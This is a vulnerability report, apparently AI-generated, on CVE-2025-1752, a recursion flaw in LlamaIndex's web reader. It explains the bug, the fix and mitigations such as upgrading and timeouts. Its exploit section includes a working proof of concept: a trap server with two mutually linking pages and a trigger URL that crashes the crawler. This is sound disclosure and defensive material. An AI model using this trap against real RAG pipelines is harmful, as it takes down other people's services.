CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2025-1752
CVSS 7.5 · EPSS 0.06%

The Infinite Loop of Death: Crashing LlamaIndex with Simple Recursion

Alon Barad
Software Engineer

Feb 21, 2026 · 5 min read

PoC Available

Executive Summary (TL;DR)

The `KnowledgeBaseWebReader` in LlamaIndex failed to increment or check recursion depth during web crawls. An attacker can supply a URL pointing to a page with circular links, causing the Python process to hit its recursion limit and crash (DoS). Fixed in `llama-index-readers-web` version 0.3.6.

In the race to feed Large Language Models (LLMs) with data, developers often overlook the basics of web crawling safety. CVE-2025-1752 is a stark reminder of this: a High-severity Denial of Service vulnerability in LlamaIndex's web reader component. By failing to track recursion depth during a crawl, the library allows attackers to trap the ingestion process in an infinite loop, leading to a stack exhaustion crash (`RecursionError`). This affects any application using `KnowledgeBaseWebReader` to ingest content from untrusted URLs.

The Hook: Feeding the Beast

We live in the age of RAG (Retrieval-Augmented Generation). Everyone and their dog is building pipelines to scrape the internet, chunk the text, embed it, and shove it into a vector database so their AI chatbot knows about the latest company policy or news article. LlamaIndex is one of the premier frameworks for this orchestration. It's the shovel we use to feed the beast.

But here's the thing about shovels: if you aren't careful, you can whack yourself in the face. Specifically, the KnowledgeBaseWebReader component—designed to crawl knowledge bases and documentation sites—had a fatal flaw in how it walked the web. It assumed that web pages are trees. They aren't. The web is a graph, and graphs have cycles.

This vulnerability isn't complex memory corruption. It's not a buffer overflow in C. It's a logic error in Python that turns a simple URL ingestion task into a process-killing weapon. If you are allowing users to submit URLs for your AI to 'learn' from, you just handed them a kill switch for your worker nodes.

The Flaw: The Placebo Parameter

The vulnerability (CWE-674: Uncontrolled Recursion) lies in the get_article_urls method. The developers intended to limit the crawl depth—they even included a parameter named max_depth in the function signature. It looks safe on paper. You see max_depth=100 and think, 'Ah, good, it won't crawl the entire internet.'

But here is the punchline: they never actually checked or incremented a depth counter. They passed the static max_depth value down to every child call, but never passed the current depth.

Imagine telling a runner, 'Stop running after 10 miles,' but never giving them a watch or mile markers. They just keep running until they collapse. In computer science terms, this is the difference between a while loop with a broken condition and a recursive function without a base case. The Python interpreter, thankfully, has a fail-safe: sys.getrecursionlimit() (usually 1000). When the code hits that wall, it doesn't just stop gracefully; it raises a RecursionError and crashes the program.
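The interpreter's fail-safe is easy to demonstrate. Here is a minimal sketch (illustrative only, not the library's code) of a self-call with no base case and no depth counter, which slams into the recursion limit almost instantly:

```python
import sys

def crawl_forever(url):
    # No base case and no depth counter: every call just recurses
    # again, mirroring the flawed crawl loop described above.
    return crawl_forever(url)

try:
    crawl_forever("http://example.com/alpha")
except RecursionError:
    print(f"RecursionError after ~{sys.getrecursionlimit()} stack frames")
```

The `except RecursionError` here is exactly what the vulnerable reader lacks: without it, the exception propagates up and kills the worker.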

The Code: The Smoking Gun

Let's look at the code. It is almost comical how close they were to getting it right, yet how completely they missed it.

The Vulnerable Code (Simplified):

def get_article_urls(self, browser, root_url, current_url, max_depth=100):
    article_urls = []
    # ... scraping logic: collect this page's articles and its outbound links ...
    for link in links:
        # CRITICAL FAIL: max_depth is passed, but no 'current_depth' is tracked.
        # The function has no idea how deep it is.
        article_urls.extend(
            self.get_article_urls(browser, root_url, link, max_depth)
        )
    return article_urls

Do you see it? max_depth is a constant. If I call this with max_depth=10, the child calls it with max_depth=10. The grandchild calls it with max_depth=10. There is no depth counter increasing (0, 1, 2...).

The Fix (Commit 3c65db2):

# Now we track 'depth' and increment it.
def get_article_urls(self, browser, root_url, current_url, max_depth=100, depth=0):
    # The Base Case! Finally!
    if depth >= max_depth:
        return []

    article_urls = []
    # ... scraping logic: collect this page's articles and its outbound links ...
    for link in links:
        article_urls.extend(
            # Increment depth!
            self.get_article_urls(browser, root_url, link, max_depth, depth + 1)
        )
    return article_urls

The fix is standard CS 101: add a depth argument, default it to 0, check if depth >= max_depth, and recurse with depth + 1.

The Exploit: Building the Ouroboros

To exploit this, we don't need advanced fuzzing or heap spraying. We just need two HTML files. Let's create a deadly trap for the KnowledgeBaseWebReader.

Step 1: The Trap

We set up a simple Flask server hosting two pages: /alpha and /omega.

  • /alpha contains a link to /omega.
  • /omega contains a link to /alpha.
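The trap can be sketched with nothing but the standard library (a Flask version is equivalent; the handler name `TrapHandler` and port are made up for this example):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Two pages that link to each other: the "ouroboros" trap.
PAGES = {
    "/alpha": '<html><body><a href="/omega">next</a></body></html>',
    "/omega": '<html><body><a href="/alpha">next</a></body></html>',
}

class TrapHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = PAGES.get(self.path)
        if body is None:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body.encode())

def run_trap_server(port=8000):
    # Blocks forever, serving the circular pages.
    HTTPServer(("0.0.0.0", port), TrapHandler).serve_forever()
```

Run `run_trap_server()` on an attacker-controlled host and the cycle is live: each page's only link points at the other.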

Step 2: The Trigger

We feed http://attacker.com/alpha to the LlamaIndex reader.

The Execution Flow:

  1. get_article_urls(..., url='/alpha') runs.
  2. Finds link to /omega. Calls get_article_urls(..., url='/omega').
  3. Finds link to /alpha. Calls get_article_urls(..., url='/alpha').
  4. Finds link to /omega...

Since the vulnerable code has no visited list (a set of URLs already processed) AND no depth limit enforcement, this ping-pong continues instantly until the Python stack explodes.
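The ping-pong can be modeled without any network I/O at all. In this sketch a dict stands in for the two pages and the function mirrors the vulnerable pattern (an illustrative model, not the library's actual code):

```python
# A two-node link graph standing in for /alpha and /omega.
LINKS = {"/alpha": ["/omega"], "/omega": ["/alpha"]}

def get_article_urls(current_url, max_depth=100):
    # Mirrors the vulnerable pattern: max_depth is passed along
    # verbatim, and neither a depth counter nor a visited set exists.
    article_urls = [current_url]
    for link in LINKS[current_url]:
        article_urls.extend(get_article_urls(link, max_depth))
    return article_urls

try:
    get_article_urls("/alpha")
except RecursionError:
    print("Worker crashed: maximum recursion depth exceeded")
```

Two static HTML files, one recursive call, one dead worker.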

This crashes the thread. If you are running this in a Celery worker or a synchronous API handler, that worker is dead. If you don't have robust supervisor processes, your service starts dropping requests.

The Mitigation: Stopping the Bleeding

The immediate fix is to upgrade llama-index-readers-web to version 0.3.6 or later. This introduces the depth tracking logic seen in the code section above.

> [!NOTE]
> Researcher's Note: Even with the patch, the crawler doesn't seem to implement a visited set (deduplication) based on the diff analysis. While the depth parameter prevents infinite recursion crashes, a site with a massive number of links within the max_depth range could still cause performance degradation (a 'wide' traversal DoS rather than a 'deep' one). However, the crash vector is resolved.
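For defense in depth, both guards can be combined. The sketch below is not the library's implementation; `fetch_links` is a hypothetical stand-in for the scraping step:

```python
def crawl(current_url, fetch_links, max_depth=100, depth=0, visited=None):
    # Two guards: a depth counter (the official fix) and a visited
    # set (deduplication, which the patch does not appear to add).
    if visited is None:
        visited = set()
    if depth >= max_depth or current_url in visited:
        return []
    visited.add(current_url)
    urls = [current_url]
    for link in fetch_links(current_url):
        urls.extend(crawl(link, fetch_links, max_depth, depth + 1, visited))
    return urls

# On the circular /alpha and /omega graph, each page is seen once.
LINKS = {"/alpha": ["/omega"], "/omega": ["/alpha"]}
print(crawl("/alpha", lambda url: LINKS[url]))  # ['/alpha', '/omega']
```

With the visited set, the circular trap terminates after two fetches instead of recursing until depth 100.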

Defensive Strategy:

  1. Upgrade: pip install --upgrade llama-index-readers-web
  2. Sanitize Inputs: Never trust user-provided URLs. Implement a blocklist for private IP ranges (prevent SSRF while you're at it) and consider checking the Content-Length or structure of the target page before fully committing resources.
  3. Timeouts: Wrap your ingestion logic in a strict timeout. If a crawl takes longer than 60 seconds, kill it. Python's func_timeout or Celery's time limits are your friends here.
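The timeout idea can be sketched with `concurrent.futures` (a sketch, not a hardened implementation; note that abandoning a thread does not kill it, which is why process-based limits like Celery's are stronger):

```python
from concurrent.futures import ThreadPoolExecutor, TimeoutError as FutureTimeout

def ingest_with_timeout(ingest_fn, url, timeout_s=60):
    # Run the (possibly hostile) crawl under a hard time budget.
    pool = ThreadPoolExecutor(max_workers=1)
    future = pool.submit(ingest_fn, url)
    try:
        return future.result(timeout=timeout_s)
    except FutureTimeout:
        # The worker thread is abandoned, not killed -- for a hard
        # kill, run ingestion in a separate process instead.
        raise RuntimeError(f"Ingestion of {url} exceeded {timeout_s}s")
    finally:
        pool.shutdown(wait=False)
```

If the crawl returns in time you get its result; if not, the caller gets a clean error instead of a hung request handler.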

Official Patches

LlamaIndex: Release notes containing the fix


Technical Appendix

CVSS Score: 7.5 / 10
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability: 0.06% (top 82% most exploited)

Affected Systems

  • LlamaIndex (Python Framework)
  • llama-index-readers-web
  • RAG Pipelines using Web Scraping

Affected Versions Detail

  • Product: llama-index-readers-web (LlamaIndex)
  • Affected Versions: < 0.3.6
  • Fixed Version: 0.3.6

  • CWE ID: CWE-674 (Uncontrolled Recursion)
  • CVSS v3.0: 7.5 (High)
  • Attack Vector: Network
  • Impact: Denial of Service (DoS)
  • Exploit Status: PoC Available
  • Patch Date: 2025-02-27

MITRE ATT&CK Mapping

  • T1499: Endpoint Denial of Service (tactic: Impact)

CWE-674: Uncontrolled Recursion

The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as memory or the program stack.

Known Exploits & Detection

GitHub: Proof of Concept demonstrating circular link crash

Vulnerability Timeline

  • 2025-02-27: Vulnerability patched in source code
  • 2025-05-10: CVE-2025-1752 published
  • 2025-10-15: CVSS score updated

References & Sources

  • [1] NVD Entry for CVE-2025-1752
  • [2] Huntr Security Advisory

Attack Flow Diagram
